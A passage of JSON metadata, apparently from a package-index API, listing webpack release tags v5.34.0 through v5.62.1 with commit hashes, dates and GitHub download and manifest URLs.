ack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/w